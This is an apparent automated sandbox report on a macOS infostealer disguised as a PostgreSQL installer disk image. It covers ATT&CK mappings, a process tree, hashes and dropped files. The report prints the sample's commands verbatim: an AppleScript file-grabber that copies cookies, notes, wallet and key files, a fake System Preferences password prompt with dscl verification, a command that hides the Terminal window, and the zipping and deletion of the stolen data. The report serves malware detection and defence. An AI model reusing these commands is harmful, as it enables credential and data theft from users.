01c9714f985ea18e3d62c611a83c36780d74617c2b284214c7fd06ba4aa78790

Analysis

max time kernel
105s
max time network
121s
platform
macos-10.15_amd64
resource
macos-20240410-en
resource tags

arch:amd64arch:i386image:macos-20240410-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
24-05-2024 04:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PostgreSQL_v.8.24.dmg
Size

8.5MB
MD5

e5375e47d4aa57e099bd80680afc9df3
SHA1

222fccee4cbc41a5612a3d3ed034bfb311f2a6bb
SHA256

01c9714f985ea18e3d62c611a83c36780d74617c2b284214c7fd06ba4aa78790
SHA512

836d37a23705abc4114d7153ad65a24465db9d4ece63856780dc2a16c596334be92af99bbf6c711acd688c50867b4fa775bb3f912d128ea6eff1d3ee592b0b82
SSDEEP

98304:c/gmaYwRcXEcwxMpiosLk9mU77yzl+mF4Ncsekgdsj1CwudKByOudKByrZkVypHS:cQfcwhosfjDpkKW75h5ryuoMYkUw

Score

7^/10

discovery evasion execution

Malware Config

Signatures

Queries the macOS version information. 1 TTPs 2 IoCs
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
discovery

System Information Discovery
T1082

Processes:

ioc process

sh -c sw_vers
sw_vers
System Checks 1 TTPs 2 IoCs
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox.
evasion

System Checks
T1497.001

Processes:

ioc process

sh -c "system_profiler SPHardwareDataType"
system_profiler SPHardwareDataType
File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer) may leave traces to indicate to what was done within a network and how. Removal of these files can occur.
evasion

File Deletion
T1070.004

ioc	process
sh -c sw_vers
sw_vers

ioc	process
sh -c "system_profiler SPHardwareDataType"
system_profiler SPHardwareDataType

AppleScript 1 TTPs 8 IoCs

AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.

execution

AppleScript

T1059.002

Processes:

ioc	process
osascript -e "set baseFolderPath to (path to home folder as text) & \"749359547\"" -e "set fileGrabberFolderPath to (path to home folder as text) & \"749359547:FileGrabber:\"" -e "tell application \"Finder\"" -e "set username to short user name of (system info)" -e try -e "if not (exists folder fileGrabberFolderPath) then" -e "make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}" -e "end if" -e "set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")" -e try -e "duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing" -e "end try" -e "set homePath to path to home folder as string" -e "set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"" -e try -e "duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing" -e "end try" -e "set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}" -e "set desktopFiles to every file of desktop" -e "set documentsFiles to every file of folder \"Documents\" of (path to home folder)" -e "repeat with aFile in (desktopFiles & documentsFiles)" -e "set fileExtension to name extension of aFile" -e "if fileExtension is in extensionsList then" -e "set fileSize to size of aFile" -e "if fileSize ≤ 51200 then" -e "duplicate aFile to folder fileGrabberFolderPath with replacing" -e "end if" -e "end if" -e "end repeat" -e "end try" -e "end tell"
sh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"
osascript -e "display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop"
sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"
osascript -e "tell application \"Terminal\" to set visible of front window to false"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
osascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
sh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"749359547\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"749359547:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"

Resource Forking 1 TTPs 2 IoCs

Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

evasion

Resource Forking

T1564.009

Processes:

ioc	process
/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper

/bin/sh
sh -c "sudo /bin/zsh -c \"open /Volumes/PostgreSQL\""
1⤵
PID:558

/bin/bash
sh -c "sudo /bin/zsh -c \"open /Volumes/PostgreSQL\""
1⤵
PID:558

/usr/bin/sudo
sudo /bin/zsh -c "open /Volumes/PostgreSQL"
1⤵
PID:558

/bin/zsh
/bin/zsh -c "open /Volumes/PostgreSQL"
2⤵
PID:559

/usr/bin/open
open /Volumes/PostgreSQL
2⤵
PID:559

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump
1⤵
PID:561

/usr/sbin/spindump
/usr/sbin/spindump
1⤵
PID:561

/usr/libexec/xpcproxy
xpcproxy com.apple.tailspind
1⤵
PID:562

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump_agent
1⤵
PID:563

/usr/libexec/tailspind
/usr/libexec/tailspind
1⤵
PID:562

/usr/libexec/spindump_agent
/usr/libexec/spindump_agent
1⤵
PID:563

/usr/libexec/xpcproxy
xpcproxy com.apple.geod
1⤵
PID:573

/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
1⤵
PID:573

/usr/libexec/xpcproxy
xpcproxy com.apple.geod
1⤵
PID:574

/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
1⤵
PID:574

/usr/libexec/xpcproxy
xpcproxy com.apple.secinitd
1⤵
PID:575

/usr/libexec/secinitd
/usr/libexec/secinitd
1⤵
PID:575

/usr/libexec/xpcproxy
xpcproxy com.apple.nehelper
1⤵
PID:577

/usr/libexec/nehelper
/usr/libexec/nehelper
1⤵
PID:577

/usr/libexec/xpcproxy
xpcproxy com.apple.AddressBook.ContactsAccountsService
1⤵
PID:578

/System/Library/Frameworks/AddressBook.framework/Executables/ContactsAccountsService
/System/Library/Frameworks/AddressBook.framework/Executables/ContactsAccountsService
1⤵
PID:578

/usr/libexec/xpcproxy
xpcproxy com.apple.routined
1⤵
PID:582

/usr/libexec/routined
/usr/libexec/routined LAUNCHED_BY_LAUNCHD
1⤵
PID:582

/usr/libexec/xpcproxy
xpcproxy com.apple.Maps.mapspushd
1⤵
PID:583

/System/Library/CoreServices/mapspushd
/System/Library/CoreServices/mapspushd
1⤵
PID:583

/usr/libexec/xpcproxy
xpcproxy com.apple.neagent.878568F8-CCE5-4157-8315-22F20DC8FB0A
1⤵
PID:586

/usr/libexec/neagent
/usr/libexec/neagent
1⤵
PID:586

/usr/libexec/xpcproxy
xpcproxy com.apple.pbs
1⤵
PID:588

/System/Library/CoreServices/pbs
/System/Library/CoreServices/pbs
1⤵
PID:588

/usr/libexec/xpcproxy
xpcproxy com.apple.TextInputMenuAgent
1⤵
PID:589

/System/Library/CoreServices/TextInputMenuAgent.app/Contents/MacOS/TextInputMenuAgent
/System/Library/CoreServices/TextInputMenuAgent.app/Contents/MacOS/TextInputMenuAgent
1⤵
PID:589

/usr/libexec/xpcproxy
xpcproxy com.apple.quicklook.ui.helper
1⤵
PID:590

/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper
/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper
1⤵
PID:590

/usr/libexec/xpcproxy
xpcproxy com.apple.Terminal.2100
1⤵
PID:591

/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
1⤵
PID:591

/usr/bin/login
login -pf run
2⤵
PID:595

/bin/zsh
-zsh
3⤵
PID:598

/usr/libexec/path_helper
/usr/libexec/path_helper -s
4⤵
PID:599

/usr/bin/locale
locale LC_CTYPE
4⤵
PID:600

/usr/bin/login
login -pf run
2⤵
PID:602

/bin/zsh
-zsh
3⤵
PID:603

/usr/libexec/path_helper
/usr/libexec/path_helper -s
4⤵
PID:604

/usr/bin/locale
locale LC_CTYPE
4⤵
PID:605

/Volumes/PostgreSQL/PostgreSQL
/Volumes/PostgreSQL/PostgreSQL
4⤵
PID:606

/usr/libexec/xpcproxy
xpcproxy com.apple.metadata.mdwrite
1⤵
PID:592

/usr/libexec/xpcproxy
xpcproxy com.apple.siri.context.service
1⤵
PID:594

/System/Library/PrivateFrameworks/ContextKit.framework/Versions/A/XPCServices/ContextService.xpc/Contents/MacOS/ContextService
/System/Library/PrivateFrameworks/ContextKit.framework/Versions/A/XPCServices/ContextService.xpc/Contents/MacOS/ContextService
1⤵
PID:594

/usr/libexec/xpcproxy
xpcproxy com.apple.audio.systemsoundserverd
1⤵
PID:596

/usr/sbin/systemsoundserverd
/usr/sbin/systemsoundserverd
1⤵
PID:596

/usr/libexec/xpcproxy
xpcproxy com.apple.AccountPolicyHelper
1⤵
PID:597

/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper
/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper
1⤵
PID:597

/usr/libexec/xpcproxy
xpcproxy com.apple.audio.AudioComponentRegistrar
1⤵
PID:601

/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar
/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon
1⤵
PID:601

/bin/sh
sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"
1⤵
PID:607

/bin/bash
sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"
1⤵
PID:607

/usr/bin/osascript
osascript -e "tell application \"Terminal\" to set visible of front window to false"
1⤵
PID:607

/bin/sh
sh -c "mkdir /Users/run/749359547"
1⤵
PID:608

/bin/bash
sh -c "mkdir /Users/run/749359547"
1⤵
PID:608

/bin/mkdir
mkdir /Users/run/749359547
1⤵
PID:608

/bin/sh
sh -c sw_vers
1⤵
PID:609

/bin/bash
sh -c sw_vers
1⤵
PID:609

/usr/bin/sw_vers
sw_vers
1⤵
PID:609

/bin/sh
sh -c "system_profiler SPHardwareDataType"
1⤵
PID:610

/bin/bash
sh -c "system_profiler SPHardwareDataType"
1⤵
PID:610

/usr/sbin/system_profiler
system_profiler SPHardwareDataType
1⤵
PID:610

/usr/libexec/xpcproxy
xpcproxy com.apple.icloud.findmydeviced
1⤵
PID:612

/usr/libexec/findmydeviced
/usr/libexec/findmydeviced
1⤵
PID:612

/bin/sh
sh -c "system_profiler SPDisplaysDataType"
1⤵
PID:613

/bin/bash
sh -c "system_profiler SPDisplaysDataType"
1⤵
PID:613

/usr/sbin/system_profiler
system_profiler SPDisplaysDataType
1⤵
PID:613

/bin/sh
sh -c "dscl /Local/Default -authonly run \"\""
1⤵
PID:615

/bin/bash
sh -c "dscl /Local/Default -authonly run \"\""
1⤵
PID:615

/usr/bin/dscl
dscl /Local/Default -authonly run
1⤵
PID:615

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:616

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:616

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:616

/bin/sh
sh -c "dscl /Local/Default -authonly run root"
1⤵
PID:619

/bin/bash
sh -c "dscl /Local/Default -authonly run root"
1⤵
PID:619

/usr/bin/dscl
dscl /Local/Default -authonly run root
1⤵
PID:619

/bin/sh
sh -c "mkdir -p '/Users/run/749359547/Chromium/Chrome'"
1⤵
PID:620

/bin/bash
sh -c "mkdir -p '/Users/run/749359547/Chromium/Chrome'"
1⤵
PID:620

/bin/mkdir
mkdir -p /Users/run/749359547/Chromium/Chrome
1⤵
PID:620

/bin/sh
sh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"749359547\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"749359547:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"
1⤵
PID:621

/bin/bash
sh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"749359547\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"749359547:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"
1⤵
PID:621

/usr/bin/osascript
osascript -e "set baseFolderPath to (path to home folder as text) & \"749359547\"" -e "set fileGrabberFolderPath to (path to home folder as text) & \"749359547:FileGrabber:\"" -e "tell application \"Finder\"" -e "set username to short user name of (system info)" -e try -e "if not (exists folder fileGrabberFolderPath) then" -e "make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}" -e "end if" -e "set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")" -e try -e "duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing" -e "end try" -e "set homePath to path to home folder as string" -e "set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"" -e try -e "duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing" -e "end try" -e "set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}" -e "set desktopFiles to every file of desktop" -e "set documentsFiles to every file of folder \"Documents\" of (path to home folder)" -e "repeat with aFile in (desktopFiles & documentsFiles)" -e "set fileExtension to name extension of aFile" -e "if fileExtension is in extensionsList then" -e "set fileSize to size of aFile" -e "if fileSize ≤ 51200 then" -e "duplicate aFile to folder fileGrabberFolderPath with replacing" -e "end if" -e "end if" -e "end repeat" -e "end try" -e "end tell"
1⤵
PID:621

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.49722E56-C6E3-457D-831C-1188AB3D9C67
1⤵
PID:626

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:626

/bin/sh
sh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/749359547 /Users/run/749359547.zip --norsrc --noextattr"
1⤵
PID:627

/bin/bash
sh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/749359547 /Users/run/749359547.zip --norsrc --noextattr"
1⤵
PID:627

/usr/bin/ditto
ditto -c -k --sequesterRsrc --keepParent /Users/run/749359547 /Users/run/749359547.zip --norsrc --noextattr
1⤵
PID:627

/bin/sh
sh -c "rm -rf /Users/run/749359547"
1⤵
PID:628

/bin/bash
sh -c "rm -rf /Users/run/749359547"
1⤵
PID:628

/bin/rm
rm -rf /Users/run/749359547
1⤵
PID:628

/bin/sh
sh -c "rm /Users/run/749359547.zip"
1⤵
PID:629

/bin/bash
sh -c "rm /Users/run/749359547.zip"
1⤵
PID:629

/bin/rm
rm /Users/run/749359547.zip
1⤵
PID:629

/bin/sh
sh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"
1⤵
PID:630

/bin/bash
sh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"
1⤵
PID:630

/usr/bin/osascript
osascript -e "display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop"
1⤵
PID:630

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportMemoryException
1⤵
PID:631

/usr/libexec/ReportMemoryException
/usr/libexec/ReportMemoryException
1⤵
PID:631

/usr/libexec/xpcproxy
xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E
1⤵
PID:633

/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
1⤵
PID:633

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

AppleScript

T1059.002

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Resource Forking

T1564.009

Indicator Removal

T1070

File Deletion

T1070.004

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/Library/Preferences/com.apple.networkextension.uuidcache.plist
Filesize
355B

MD5
a6ef4856e99c9d8e1d9bb762c5a8503a

SHA1
25d5405ad91791b716ae5a56b37aa2b393854967

SHA256
232441aa129d4f21999860b8bf31db4b8617df9f7d32ef5f25a383edff82d9fa

SHA512
582fa1ea60766a5a4e99b295a8ed98c94f6bab45e42b7e8db61e9ad645f531891082cd457bfd11d660195af86f02c4ed93589e6e6daded683cff2d8319bbc489

Download Submit
/Users/run/./749359547/Chromium/Chrome/Autofill0
Filesize
90KB

MD5
4e9060f76c1cb5b54005dc6640a58f0d

SHA1
04a1e6791ae55612d9b63f23ccb37eec398b3d27

SHA256
5b6dd3116e1d3ecbf6d07ecfc03f1537ab00ce91336cc7c6cddda6df0c9984d3

SHA512
be921e02bb810fb867c1de3e3c2a9c3b04c84188d6a9eae60b73558bd4748c1451161da8fba2c8e74f225be4b8a6f0e98276fe1e397b0083fcbbd4ebdf32e148

Download Submit
/Users/run/./749359547/Chromium/Chrome/Cookies2
Filesize
20KB

MD5
2a3fa78b5f55b529a2698ad187c80204

SHA1
cbbda35512038de511ac23b0aed12e9e86bcc796

SHA256
d52ad17cc5096119732f06311ef2e25005c2a00f551c9684e2d655cbc846455b

SHA512
e9b113ec0c6a888e059cf625b0bfb128d11a55970fed12df30848c9f836c5f36b2660abb4e2a820e7dedd6f0ead312edec1c6cd645f14091d98b42f696bda9ab

Download Submit
/Users/run/./749359547/Chromium/Chrome/Password1
Filesize
40KB

MD5
b6914d8e5cb470236eceed8d6f8b4fb7

SHA1
cdff8880e9fa7630fc8d57af4669365b5ab29b60

SHA256
45bda2415419c24d2526ae60cae5ee1d66bc8d2cc986bb9e94c0f3c414af06c1

SHA512
1c491cfeb2b883ed20a43e16d7bf620520f4b770c8727ffb83e02554aa6aa54def4732460bcff82014050f7a1fba38e01f5570cacfbfcef6da6f2f795dc56ee7

Download Submit
/Users/run/./749359547/Sysinfo.txt
Filesize
1KB

MD5
31717a21202f4dbab34a72c86ae4f3f2

SHA1
78fab4a3136000513a8f66f2d81d19cb2473338d

SHA256
6e50323737f1ebceb1d9f4e1fb36e5b02ff684de7711f54df08128e966f130da

SHA512
4c79b4b4705b897f2e43aec1ad622df2af929fc58a4e7c44d052b2e39c789bb266d4efc150e00896ac530aede6187c60dba572e78ada2b620f2f4e46f0c6cf5c

Download Submit
/Users/run/./749359547/login-keychain
Filesize
104KB

MD5
88fdb5b7b0b1d62c1a0a85d11c89695f

SHA1
8ad846cb1ae680be0741cd6b70ea1b1d66c4f618

SHA256
41189841ac6673809b05660649817ee15af631d04f00f8f828762e674ff04156

SHA512
c5edce0d57f069e1d41313a62d507158e83bd7d7518e83776873fb6b5a3035e09a44f2f022d218b09c99953ecd72d0aaa1df127b8d6607f9aa10678158350a2d

Download Submit
/Users/run/./749359547/password-entered
Filesize
4B

MD5
63a9f0ea7bb98050796b649e85481845

SHA1
dc76e9f0c0006e8f919e0c515c66dbba3982f785

SHA256
4813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2

SHA512
99adc231b045331e514a516b4b7680f588e3823213abe901738bc3ad67b2f6fcb3c64efb93d18002588d3ccc1a49efbae1ce20cb43df36b38651f11fa75678e8

Download Submit
/Users/run/Library/Caches/GeoServices/ActiveTileGroup.pbd
Filesize
124KB

MD5
559403b5422f501e553161494a4538c8

SHA1
4cb61b47146ae079f6b75f46bc0ded643f7bb4e3

SHA256
0acdd47c5e23986768f410740a94895b6a528925105f922671c713c2145fcb2e

SHA512
233e847226c9fbd548ce1f4d2a24246ff076fec156a386a7065aae1f9a8f9c631ebf1926f0e1cc6fac645806be766ccf80bb8e662618ae9297be835874f958b7

Download Submit
/Users/run/Library/Caches/GeoServices/Resources/altitude-1285.xml
Filesize
179KB

MD5
9a43af57707d2fb460832049d1f217d1

SHA1
056d813f8cb5198ca82072f7e3484f38ea5267f8

SHA256
7224f8828694ed74a8353567e4d84da188d15a993a4a75938f8409cb49218e7c

SHA512
1f33175f5d0958c79540a627552f71c6960b6ff19c9b2b0aa604c00bfeff216f6ea2ec3a22ef91ad8d7249597fdf5ad49ddbf5f4aef71b397e785152474954d7

Download Submit
/dev/ttys000
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
/var/folders/zz/zyxvpxvq6csfxvn_n00000sm00006d/C//mds/mdsDirectory.db
Filesize
47KB

MD5
0e4a0d1ceb2af6f0f8d0167ce77be2d3

SHA1
414ba4c1dc5fc8bf53d550e296fd6f5ad669918c

SHA256
cca093bcfc65e25dd77c849866e110df72526dffbe29d76e11e29c7d888a4030

SHA512
1dc5282d27c49a4b6f921ba5dfc88b8c1d32289df00dd866f9ac6669a5a8d99afeda614bffc7cf61a44375ae73e09cd52606b443b63636977c9cd2ef4fa68a20

Download Submit
/var/folders/zz/zyxvpxvq6csfxvn_n00000sm00006d/C//mds/mdsObject.db
Filesize
4KB

MD5
d3a1859e6ec593505cc882e6def48fc8

SHA1
f8e6728e3e9de477a75706faa95cead9ce13cb32

SHA256
3ebafa97782204a4a1d75cfec22e15fcdeab45b65bab3b3e65508707e034a16c

SHA512
ea2a749b105759ea33408186b417359deffb4a3a5ed0533cb26b459c16bb3524d67ede5c9cf0d5098921c0c0a9313fb9c2672f1e5ba48810eda548fa3209e818

Download Submit